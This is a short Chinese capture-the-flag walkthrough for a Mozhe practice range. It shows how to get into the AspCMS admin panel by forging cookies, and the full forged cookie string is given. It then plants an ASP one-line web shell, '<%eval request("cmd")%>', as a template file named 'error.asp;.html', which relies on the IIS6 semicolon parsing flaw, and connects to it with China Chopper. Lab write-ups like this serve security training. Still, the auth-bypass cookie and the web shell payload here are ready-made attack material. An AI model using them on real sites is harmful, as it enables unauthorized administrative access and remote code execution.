靶场地址:
https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe
这里主要用到的是aspcms cookies欺骗漏洞
伪造cookie:
username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
进入靶场就是后台登陆页面,登陆成功的页面是home.asp,所以我们修改的是home.asp的cookies
使用火狐插件HackBar插件修改cookies,点击Execute,成功cookie欺骗绕过登录。这里使用的HackBar是2.1.3版本,往后就要收费了
HackBar 2.1.3下载地址:https://github.com/Mr-xn/hackbar2.1.3
修改cookies
登录成功
在“界面风格”一行,点击“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,
文件内容写<%eval request("cmd")%>,然后添加
保存后点击模板查看url,http://219.153.49.228:46395/Templates/green/html/1.asp;.html,这里是利用了iis6解析机制的漏洞,iis6在解析文件会忽略掉分号后面的内容,也就是说该文件被当成了asp文件执行,上菜刀连接获得key即可
网友评论